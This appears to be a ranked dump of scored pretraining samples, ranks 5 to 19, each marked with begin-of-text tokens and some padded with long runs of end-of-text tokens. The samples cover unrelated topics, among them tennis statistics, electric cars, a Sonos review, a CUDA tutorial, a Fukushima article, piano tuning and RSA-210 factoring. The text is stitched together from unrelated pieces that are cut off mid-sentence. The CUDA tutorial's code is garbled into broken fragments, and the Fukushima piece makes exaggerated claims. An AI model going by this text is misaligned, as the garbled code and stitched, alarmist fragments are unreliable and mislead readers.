Seasons Holding From 40/30 + +2017 = 96.3% (157/163) + +2016 = 95.5% (107/112) + +2015 = 94.7% (271/286) + +Even worse news for his opponents: Federer has slightly improved in this specific category during the past three seasons. This year, he's led 40/30 during 163 service games and has lost only six of those games. Opponents must feel like they are getting closer to capturing Federer’s serve, but in reality, they are farther away from breaking than they were at 0/0. + +Infosys Nia Data shows that in 2017 Federer is holding serve 91 per cent of the time, but at 40/30, he is holding 96.3 per cent (157/163) of the time. The returner winning two points in the service game doesn’t trump the fact that Federer needs just one more point to hold. When the Swiss star has surged ahead 40/15 this season, his win percentage has elevated to a near-perfect 99.1 per cent (229/231). + +Marin Cilic is the second best performer of current Top 10 players, holding serve from 40/30 94.6 per cent (596/630) of the time since the beginning of the 2015 season. Former World No. 1s +================================================================================ +Rank = 5; Score = 2867200.0 +<|begin_of_text|>Photos: World's most exciting electric supercars Renovo Coupe – + +Acceleration: 0-60 mph (0-96.6 kph) in 3.4 seconds + +Top Speed: 120 mph (193.1 kph) + +Horsepower: 550 + +Range: 100 miles (160.9 km) + +Charging Time: 'Fast Charge' in 30 minutes; Level 2 charge in 5 hours Hide Caption 1 of 20 + +Photos: World's most exciting electric supercars Renovo Coupe – Renovo claim the coupe is the "first all-electric American supercar." "The Renovo team has real-world track experience with championship-winning Formula One and Le Mans programs," Chris Heiser, the Renovo co-founder, told CNN. "Renovo is at the forefront of the automotive industry revolution." + +Hide Caption 2 of 20 + +Photos: World's most exciting electric supercars Faraday FFZERO1 – + +Acceleration: 0-60 mph (0-96.6 kph) in under 3 seconds + +Top Speed: 200 mph (321.9 kph) + +Horsepower: 1,000 + +Range: "While we are not ready to discuss specifics about range, we intend to offer an industry-leading battery in our vehicles," Gillian Roberts of Faraday told CNN. + +Special Features: "Inspired by NASA zero gravity design, the driver's seat allows for an unparalleled sense of weightlessness and reduced driver fatigue," Faraday claim. + +Hide Caption 3 of 20 + +Photos: World's most exciting electric supercars Faraday FFZERO1 – "You don't have to sacrifice anything for being sustainable," Richard Kim, head of design for Faraday Future told CNN at the car's unveiling. "This is a 100% sustainable, electric, non-polluting vehicle, and it can be as dynamic as 1,000 horsepower." According to the company website, Faraday "believe there is a future where the natural world and the man-made world harmoniously co-exist -- each nourishing the other in sustainable balance." Hide Caption 4 of 20 + +Photos: World's most exciting electric supercars Toyota TMG EV P002 – + +Acceleration: 0-62 mph (0-100 kph) in 3.9 seconds + +Top Speed: 158 mph (255 kph) + +Horsepower: 469 + +Range: "I think at racing speed, if you say approx 50km it will be accurate +================================================================================ +Rank = 6; Score = 2703360.0 +<|begin_of_text|>“One of the most robust findings in the economics of happiness is that unemployment is highly damaging for people’s wellbeing. We find that this is true around the world.” … “Not only are the unemployed generally unhappier than those in work, but we also find that people generally do not adapt over time to becoming unemployed unlike their responses to many other shocks.” Excerpts from “Happiness at work”, CentrePiece magazine, Autumn 2017, London School of Economics and Political Science “Participating in the satisfying work of innovating enriches lives by endowing them with purpose, dignity, and the sheer joy of making progress in challenging endeavors. Imaginative problem-solving is part of human nature. Participating in it is essential to the good life – and no elite minority should have a monopoly on that.” … “The technologies our species is developing might either hold the keys to unlocking human potential — or to locking it up more tightly than ever.” Excerpts from “Meaningful Work Should Not Be a Privilege of the Elite”, Harvard Business Review, 03 April, 2017 “Viewed narrowly, there seem to be almost as many definitions of intelligence as there were experts asked to define it.” – “Abilities Are Forms of Developing Expertise”, Robert J. Stenberg, Educational Researcher, April, 1998 “One day the AIs are going to look back on us the same way we look at fossil skeletons on the plains of Africa. An upright ape living in dust with crude language and tools, all set for extinction.” – Ex Machina (2014) + +In Matilda, the children’s fantasy movie directed by Danny DeVito and based on Roald Dahl’s book of the same name, the lead character, six-and-a-half year old Matilda, on her first day of school correctly calculates the result of 13 times 379 in her head – much to the amazement of her teacher and classmates. If such an event had taken place in our classrooms, we too would have been astounded and many, if not all, of us would have described young Matilda as being intelligent or even a genius. Yet if we told you that we have a machine that can solve the very same problem in less than a nanosecond, would any of you describe it as being intelligent? We suspect not; although, some may describe the person who designed the machine as being intelligent. + +What then is intelligence? + +We conducted an informal experiment (read: an impromptu poll on Whatsapp +================================================================================ +Rank = 7; Score = 2392064.0 +<|begin_of_text|>Share + +Sonos is wildly popular for a reason. We in the tech biz toss the term “wireless multiroom audio” around a lot, but what Sonos really does is put great-sounding music in every corner of your home or business — and they make it dead simple. We like to think of Sonos as the audio company Apple wishes it could be — one that gives you amazing sound that “just works.” So what could possibly raise our enthusiasm about the company and its wares? We have the answer for you here in our Sonos One review. + +Sonos isn’t alone in this game any longer. Alexa came along and blew the home speaker floodgates wide open. With its open digital assistant platform, Amazon was able not only to popularize its own speaker products, but also to see to it that Alexa started popping up everywhere and controlling everything. Today, if your product doesn’t work with Alexa, it’s considered behind the times. What’s more, Google was prodded to get in on the action and is now pushing its own line of speakers. + +Sonos had to pivot, and pivot it has. In October, Sonos announced the Sonos One, a reimagined version of its popular Play:1 speaker that’s built to be the smartest smart speaker on the market. Out of the box, the Sonos One supports Amazon’s Alexa, but the company promises Google Assistant will come to the One sometime in 2018. Follow below to find out if the company’s latest effort to even further simplify whole-home audio is as successful as it sounds. + +Out of the box + +Dan Baker/Digital Trends + +Sonos long ago perfected its out-of-box experience, drawing inspiration from the folks at Apple and making it all its own. Inside the Sonos Play One box, you’ll find a simple setup card, information on downloading and setting up Amazon’s Alexa app, and a clever sort of “dial” meant to inform and inspire you to tell Alexa how to get music going in your home. + +Setup + +We’ve been praising Sonos for its foolproof setup process, and we’re going to go ahead and keep heaping on the kudos. Figuring out how to seamlessly integrate Amazon’s Alexa assistant and app into its ecosystem is something the company says it pored over for months — and it shows. The process is, like all things Sonos, dead simple. + +We’ve been praising Sonos for its foolproof setup process, and we’re going keep heaping on the +================================================================================ +Rank = 8; Score = 1925120.0 +<|begin_of_text|>Pet thefts are on the rise, according to the American Kennel Club. (credit: CBS 2) + +— Dogs are being stolen out of cars, yards, off sidewalks and even out of shelters at an alarming rate, according to the American Kennel Club. + +“It only takes a minute for a theft to occur,” American Kennel Club spokeswoman Lisa Peterson told CBS 2’s Dave Carlin on Friday. + +Making any pet owner think twice is surveillance video from last week that showed “Marley” the Cavalier King Charles Spaniel being menaced by a stranger, who picked up the frightened dog and walked off with him, leaving 7-year-old Mia Bendrat heartbroken the day before Christmas. + +“You knew that was somebody’s dog and it was Christmas Eve. I mean really?” Bendrat said. + +Marley was sold to a woman in Greenwich Village, who thought the situation was fishy. + +Marley was checked for a microchip and Mia and her best friend were reunited. + +But happy endings are rare as dognapping cases rise nationwide by almost 70 percent, according to the American Kennel Club. + +“Last year for example we tracked more than 432 pet thefts and that’s just scratching the surface,” Peterson said. “For the first time ever we’ve seen a trend now where shelters are being broken into and purebred and mixed breed dogs are being stolen.” + +Dognappings from stores, shelters and backyards and off sidewalks are preventable. + +Experts say to safeguard your pet as you would a child. + +“Don’t leave it unattended,” Peterson said. + +There are products available so you don’t let your pet out of your sight. + +The American Kennel Club recommends doing anything you can do, but most importantly to get your pet microchipped. + +“Because that’s the only way you can prove ownership and get your dog back should it turn up at a vets office or shelter,” Peterson said. + +And if you are running errands, experts advise keeping your pets home to stop making things so easy for a new breed of criminals. + +The American Kennel Club tracked 432 pet thefts in 2011, compared to 255 thefts in 2010. + +Share your thoughts in the comments section below…<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 9; Score = 1736704.0 +<|begin_of_text|>+ 14 + +Architects Cox Architecture with Architects 61 + +Location Queen Elizabeth Walk, Esplanade Mall, Singapore + +Category Pedestrian Bridge + +Project Team Philip Cox, Michael Rayner, Hang Chung Ling, Spyros Barberis, Lynn Heng, Michael Ngu, Siti Suriah Taib, Sunita Menon. + +Consultant Team Arup - Structural consultant, Arup - Civil consultant, Arup - Mechanical consultant, Arup - Electrical consultant, Arup - Lighting consultant, Tierra Design - Landscape consultant, Davis Langdon Seah - Cost Consultant. + +Cost At Completion Of Construction SGD$82.900.000 + +Construction Team Sato Kogyo (S) Pte Ltd – Builder + +Area 1379.08 m2 + +Project Year 2010 + +Photographs Christopher Frederick Jones, Angus Martin + +The Helix Bridge provides a pedestrian connection across the head of the Singapore River between the city’s existing CBD and its new Bayfront district. Its commission was the result of a selected 36-entry international design competition held in 2006. + +The plan concept was to curve the bridge in an arc so that it arrives fluidly into foreshore promenades on each side. It also enabled the bridge to connect in its centre to an adjacent vehicular bridge’s footpath while shifting away from it beyond this point of junction. + +Seeking a delicate, lightweight contrast to the vehicular bridge, the concept evolved of a double helix structure. This form enabled the canopy, required by the brief, to be integrated as segmented panels of glass and perforated steel, unlike other bridge structures. The structural typology also proved highly effective in working to a curvilinear plan, and in generating an intriguing sense of movement flow along the journey. + +The Helix Bridge is illuminated at night by ribbons of LED lighting accentuating the interplay of the two helix tubes and their intervening, connecting ties. Four ovular-shaped ‘pods’ cantilever out from the structure enabling people to gain wider appreciation of the bridge form and providing gathering space for viewing bay events. Conceptual Framework The design of The Helix Bridge responds to the brief of an international architectural competition calling for a unique structural form that could be symbolic of Singapore’s goal of promoting the identity of Asia’s ‘connected city’. The plan concept was to curve the bridge away from an adjoining linear vehicular bridge, such that it touched at a point for pedestrian interconnection, yet descended in each direction to fluidly continue along existing prom +================================================================================ +Rank = 10; Score = 1630208.0 +<|begin_of_text|>In 8-dimensional geometry, there are 256 uniform polytopes with B 8 symmetry. There are two regular forms, the 8-orthoplex, and 8-cube with 16 and 256 vertices respectively. The 8-demicube is added with half the symmetry. + +They can be visualized as symmetric orthographic projections in Coxeter planes of the B 8 Coxeter group, and other subgroups. + +Graphs [ edit ] + +Symmetric orthographic projections of these 256 polytopes can be made in the B 8, B 7, B 6, B 5, B 4, B 3, B 2, A 7, A 5, A 3, Coxeter planes. A k has [k+1] symmetry, and B k has [2k] symmetry. + +These 256 polytopes are each shown in these 10 symmetry planes, with vertices and edges drawn, and vertices colored by the number of overlapping vertices in each projective position. + +References [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 11; Score = 1622016.0 +<|begin_of_text|>Netflix Inc. (NFLX) is a video streaming giant that provides more than 100 million users with syndicated as well as original TV shows and movies. Since its humble beginnings as a mail-order movie and TV show delivery service in 1997, the company has come a long way, effectively killing its biggest competitor Blockbuster Entertainment. Netflix went public on May 23, 2002, and an investment of $990 on Netflix's initial public offering, or IPO, date of May 23, 2002, would have generated over $310,000 after stock splits. that's a gain of 31,260% + +Early Investment in Netflix + +If you invested $990 right after Netflix's IPO, assuming you purchased each share of Netflix at its IPO price of $15, you would have 66 shares. Netflix did not continue higher; instead, it traded in a downtrend until early October 2002, where it hit a low of $4.85. But things turned around for the company and the early investors. + +2004 Two-for-One Netflix Stock Split + +On Feb. 11, 2004, Netflix closed at $71.96 per share. On Feb. 12, 2004, Netflix issued a two-for-one stock split, so those 66 shares would double to become 132 shares. On Feb. 12, 2005, Netflix closed at $37.30 per share. The investment of $990 would have been worth $4923.60, a return on investment, ROI, of 397%. + +Thereafter, Netflix had its ups and downs but overall the stock kept climbing crossing one price milestone after another. + +Source: FactSet + +2015 Seven-for-One Netflix Stock Split + +Nearly 11 years later, Netflix reported its quarterly earnings and shares made a new all-time high. The company was announced another stock split, this time, a seven-for-one stock split, on July 15, 2015. On July 15, 2015, your 132 shares would become 924 shares. On the date of the stock split, Netflix closed at $98.13 per share. The total position was worth $90,672.12 at the close, a 9058% increase over the initial investment amount. + +Present-Day Value From a Netflix IPO Investment<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 12; Score = 1589248.0 +<|begin_of_text|>If you could purchase 100 block erupter sapphires for 35BTC today, that would give the fund another 33Gh/s (@250Watts). The break even TODAY is about 85 days. Say the network hash rate doubles in the fall, that would mean 170 days or if it triples, 255 days. They sip power so running them longer isn't an issue. I realize you would need good hubs which are ~$70US each for an aluminum 10 port USB 3 powered hub (aitech sells one through amazon for 69.99 - I believe the seller's name is computerExtension). I know these work great for 10 usb miners. Are you currently running a couple of 6770's and a couple of 7770's for bitcoin? Even if we just purchase sufficient amounts of block erupters to replace those, we would be further ahead. The usb hubs would com in handy for the next gen asics too I'm sure. They have to release a little usb key for those if us who can't afford the big rigs!!I ordered 20 block erupter blades last wednesay and had them running by Friday evening before I left for work. I paid 5.99 BTC/10 and I saw just last night the price dropped to 4.19BTC/10 (free UPS express shipping until Aug 15th on 5BTC+ orders). The miners were new and worked perfectly. I'm hesitant to mention this seller as I see BTCGuild store is 1000 units shy right now!I'm just thinking in the short term to keep up our percentage of the network share while you formulate a long term plan.Thoughts anyone?Take care + +Thanks for the confidence guys, it's appreciated. I'd like to get as much feedback as possible in order to reach a consensus on the direction we should take going forward as far as future hardware purchases go. I favor Bitfury gear due to their efficiency claims and ability to demonstrate progress in their development process. On the other hand I've seen little evidence to convince me that knc will be able to deliver products on their timeline. Does anybody disagree with my take on this and if so why? Also does anybody have any other suggestions as far as which vendor they feel is a better choice and if so why? Avalon has said they were done with pre-orders and that they were developing 55nm? chips of their own for October delivery. Clearly their reputation has been tarnished, but +================================================================================ +Rank = 13; Score = 1556480.0 +<|begin_of_text|>0. List of contents + +1. Requirements + +Basic knowledge about C programming + +CUDA supported device (CUDA GPU list) + +Installed CUDA SDK + +Eclipse/nvidia nsight (nsight recommended) + +2. Goal + +The aim of this article is to get acquainted with bilinear interpolation technique and implement demo program which is going to scale given input image using nvidia CUDA SDK. The concept of interpolation is not explained here. + +3. Optimus (hybrid graphics card) + +What if I have CUDA compatibile device as a secondary graphics card (optimus)? + +First of all (if you haven’t done it yet) install Bumblebee deamon. + +It’s available on many popular distros, for instance: + +# Archlinux pacman -S bumblebee # Ubuntu 12.04 sudo add-apt-repository ppa:bumblebee/stable sudo apt-get update sudo apt-get install bumblebee virtualgl linux-headers-generic + +After reboot perform: + +sudo tee /proc/acpi/bbswitch < <> 8) && 0xff)); printf("Red: 0x% +================================================================================ +Rank = 14; Score = 1548288.0 +<|begin_of_text|>Common Core Is Pretty Dumb + +Check out this problem: + +If that isn't big enough on your screen here, hit the twitchy link to get a bigger picture. + +What they're asking kids to do is this: Rather than simply memorize the fact that seven plus seven equals fourteen, they're training kids to recognize possible shortcuts or easier paths to computation. If a kid realizes a seven is made up of 3 plus four, and remembers that three plus seven equals ten, then he can "simplify" the problem as ten plus four, which gives fourteen. + +Here's the problem: The shortcut/easier path of computation is actually more complicated than just learning that seven plus seven equals fourteen. + +This is Cargo Cult stuff. They did the same thing with their new innovations in Whole Word learning (reading a word at a glance), when they got rid of Phonics (sounding a word out, letter by letter), and doomed a generation to being bad readers. + +Here's the Cargo Cult part: + +Professional Highly-Educated Education Researchers noted that high-level early readers were usually just identifying words at a glance -- reading in a "whole word" way. While kids using Phonics read more slowly. Phonics kids were slower readers and struggled with it more. + +So hey -- let's stop teaching kids this slow method of reading called Phonics and just teach them "Whole Word" reading!!! Win, win, win!!! It's easier for the students, and even easier for the teachers, as they don't have to teach the step-by-step Phonics method of reading. They can just say the word "horse" is horse and keep saying it until these stupid kids start learning that "horse" means horse. + +Here's the problem: This is Cargo Cult mneliaty. Yes, the high-lanrneig, early-raednig kids are in fact using the Wlohe Wrod raenidg mhoted, just as you, reading that gibberish I just wrote, employed Whole Word reading -- looking at the first and last letters of the word and using context and years and years of experience in how the written language works, and what words are expected to come in which place in a sentence to read, fairly easily, a bunch of misspelled words as the words I intended. + +But the high-learning, early-reading kids are only doing that because they started reading earlier than the other kids. All kids -- including the early readers -- go through the Phonics phase. One of my earliest recollections (maybe +================================================================================ +Rank = 15; Score = 1548288.0 +<|begin_of_text|>2.6k SHARES Share Tweet + +Six years ago, an absolutely devastating tsunami caused a triple meltdown at Japan’s Fukushima nuclear power facility. It was the worst environmental disaster in all of human history, and even though six years have passed since that time, nobody knows where the three melted cores are. Just recently, authorities believe that they spotted some melted fuel underneath reactor 2, but even from a distance the level of nuclear radiation that was detected was being described as “unimaginable”. Essentially what we are talking about are three enormous “dirty bombs” that are continuously emitting tremendous amounts of nuclear radiation into the air, water and soil. Some of the radioactive elements that are being released have half-lives that are measured in tens of thousands of years, and so the poisonous effect of these “dirty bombs” could potentially be with us for generation after generation. + +Personally, I don’t know why the big mainstream news outlets in the U.S. are almost entirely ignoring Fukushima these days. Fox News did a story on the “unimaginable” radiation at Fukushima just a few days ago, but that was about it. + +To me, it is certainly newsworthy that nuclear radiation inside reactor 2 at Fukushima is at the highest level ever recorded… + +Radiation levels inside a damaged reactor at Japan’s Fukushima nuclear plant have hit a record high, and are the worst since the plant suffered a triple meltdown nearly six years ago. The latest readings now pose a serious challenge as officials prepare to dismantle the stricken facility. Radiation levels inside the containment vessel of reactor No. 2 at Fukushima has reached 530 sieverts per hour—a figure described by experts as “unimaginable.” + +Previously, the highest level of radiation measured at Fukushima was 73 sieverts per hour, and just a small fraction of that amount would be fatal to most humans… + +Needless to say, this plant is not fit for human life. Just one dose of a single sievert is enough to cause radiation sickness and nausea. Exposure to four to five sieverts would kill about half of those exposed to it within a month, while a single dose of 10 sieverts is enough to kill a person within weeks. + +At 530 sieverts per hour, the radiation is so intense that even robots can only last for a couple of hours in that environment. The Japanese hope to eventually remove the melted fuel from these reactors someday, but first they have to figure out if it is even possible. + +And the truth is that the level of radiation in reactor 2 may actually be far higher +================================================================================ +Rank = 16; Score = 1540096.0 +<|begin_of_text|>1.9k SHARES Share Tweet + +Look at Ms. going full SWERF on us. The hell is this? https://t.co/P7J9NByhI6 — Amadi (@amaditalks) November 4, 2015 + +Like many feminists, my interest in women’s rights began when I started noticing I was treated like I was less than the men around me. I didn’t analyze much deeper than that — I just needed confirmation that something wasn’t right, I wasn’t imagining it, and it wasn’t my fault. Now that my analysis has gone deeper, and is rooted firmly in an anti-oppression framework, it’s clear to me that when I first started learning and believing in feminism I was, in fact, a liberal feminist. + +Liberal feminism provides an individualistic view of women’s rights that holds equality with men as its end goal. Liberal feminism focuses on advancing women’s positions in existing institutions and believes that what women want out of life is what men want and have already secured for themselves. + +Way back then, I understood feminism in relation to my life, my experiences, and my choices. I didn’t spend much time considering how my internalized misogyny shaped those choices — even the choices I now see were problematic because they reinforced mechanisms of women’s oppression. + +For me, then, and for liberal feminists today, the individual is queen. Any choice a woman makes is, by definition, a feminist choice because choosing is a feminist act. Even choices like pandering to the male gaze or self-objectifying must be applauded. As a result, I often engaged in decidedly unfeminist behaviour while uncritically wrapping myself in a comfortingly progressive label. + +Once I began critically examining my beliefs and learning more about the history of feminism, I realized the many ways in which so-called liberal feminism falls short. What soon became clear was that liberal feminism isn’t feminism at all. Uncritically worshipping individual choices ignores the structures and institutions that support patriarchy. Focusing narrowly on advancing in the public sphere ignores the oppression women face in our homes. More worryingly, refusing to examine the context and impacts of our choices allows men and women to continue reinforcing misogyny and male supremacy while patting themselves on the back and failing to work towards liberation for all women in any meaningful way. + +Supporting misogynist ideas, behaviours, and structures while declaring yourself a feminist requires a stunning lack of self-awareness and critical thinking, and an intricate set of unquestioned beliefs whose main purpose is +================================================================================ +Rank = 17; Score = 1499136.0 +<|begin_of_text|>This beautiful instrument cannot be tuned. Image: Gryffindor, via Wikimedia Commons. CC BY-SA 3.0. + +The integers are a unique factorization domain, so we can’t tune pianos. That is the saddest thing I know about the integers. + +I talked to a Girl Scout troop about math earlier this month, and one of our topics was the intersection of math and music. I chose to focus on the way we perceive ratios of sound wave frequencies as intervals. We interpret frequencies that have the ratio 2:1 as octaves. (Larger frequencies sound higher.) We interpret frequencies that have the ratio 3:2 as perfect fifths. And sadly, I had to break it to the girls that these two facts mean that no piano is in tune. In other words, you can tuna fish, but you can't tune a piano. + +When we tune an instrument, we would like for all our octaves and fifths to be perfect. One way to tune an instrument would be to start with a pitch and start working out the fifths above and below it it. We start with some frequency that we call C. Then 3/2 times that frequency is G, 9/4 times that frequency is D (an octave and a step above our original C), and so on. If you learned about the “circle of fifths” at some point in your musical life, then you know that if we keep going up by fifths, we’ll eventually land back on something we'd like to call C. It takes a total of 12 steps, and so if we keep all our fifths perfect, the frequency of the C we get at the end is 312/212, or 531441/4096, times the frequency of the C we had at the beginning. You might notice that 531441/4096 is not an integer, much less a power of 2, so our ears would not perceive the C at the end as being in tune with the C at the beginning. (531441/4096 is about 130, which is 2 more than a power of 2, so we would hear the C at the top as being sharp.) And it's not a problem with the assumption that it takes 12 fifths to get from C to shining C. We can never get perfect octaves from a stack of fifths because no power of 3/2 will ever give us a power of 2. + +Imperfect octaves are +================================================================================ +Rank = 18; Score = 1441792.0 +<|begin_of_text|>ryanp + +Jun 2012 San Mateo, CA + +24×32 Posts + +RSA-210 factored + +RSA-210 has been factored by GNFS. The 210-digit composite + +Code: N = 245246644900278211976517663573088018467026787678332759743414451715061600830038587216952208399332071549103626827191679864079776723243005600592035631246561218465817904100131859299619933817012149335034875870551067 + +Code: Thu Sep 26 07:17:57 2013 prp105 factor: 435958568325940791799951965387214406385470910265220196318705482144524085345275999740244625255428455944579 Thu Sep 26 07:17:57 2013 prp105 factor: 562545761726884103756277007304447481743876944007510545104946851094548396577479473472146228550799322939273 + +Code: Mon Sep 23 11:09:41 2013 commencing Lanczos iteration (32 threads) Mon Sep 23 11:09:41 2013 memory use: 26956.9 MB Mon Sep 23 11:10:27 2013 restarting at iteration 1026631 (dim = 64920012) Mon Sep 23 11:13:33 2013 linear algebra at 99.3%, ETA 15h43m Mon Sep 23 11:14:32 2013 checkpointing every 30000 dimensions Tue Sep 24 02:21:56 2013 lanczos halted after 1033963 iterations (dim = 65383602) Tue Sep 24 02:24:01 2013 recovered 22 nontrivial dependencies Tue Sep 24 02:24:17 2013 BLanczosTime: 55712 Tue Sep 24 02:24:17 2013 elapsed time 15:28:33 Tue Sep 24 03:21:13 2013 Tue Sep 24 03:21:13 2013 Tue Sep 24 03:21:13 2013 Msieve v. 1.52 (SVN 936M) Tue Sep 24 03:21:13 2013 random seeds: +================================================================================ +Rank = 19; Score = 1409024.0 +<|begin_of_text|>Share + +We know they resemble miniature shower heads, or perhaps a pair of rather fetching earrings; we know they incorporate dual optical sensors so they can automatically pause and play music; we know they come with dual microphones and a battery that should keep them powered for up to five hours on a single charge; and we know they’ll empty our wallet of $159 should we decide they’re the perfect fit for our shiny new iPhone 7. + +What we don’t know, however, is whether they’ll keep slipping out of our ears. + +Costing as much as they do, the sensation of one of the earpieces slipping from our ear is likely to be as scary as it is annoying. Conan O’Brien, evidently aware of such concerns, this week came up with an amusing spoof ad (above) that draws its inspiration from those classic Apple commercials broadcast around 10 years ago. O’Brien clearly believes the AirPods are set to become a real money-spinner for the Cupertino company – so long as people keep losing them. + +Questioned on the burning issue during an appearance on Good Morning America this week, Apple CEO Tim Cook insisted that up to now, when trying out the AirPods, they’ve not once dropped out. + +“I’ve been on treadmills, walking, doing all the things you normally do … and I have never personally had one fall out” Cook said, adding that “snipping the wires” actually makes them more secure than wired alternatives as they don’t get caught on things or slip out through their own weight. + +The iPhone 7 launches today, but we won’t find out how secure the AirPods are till the end of next month, which is when they go on 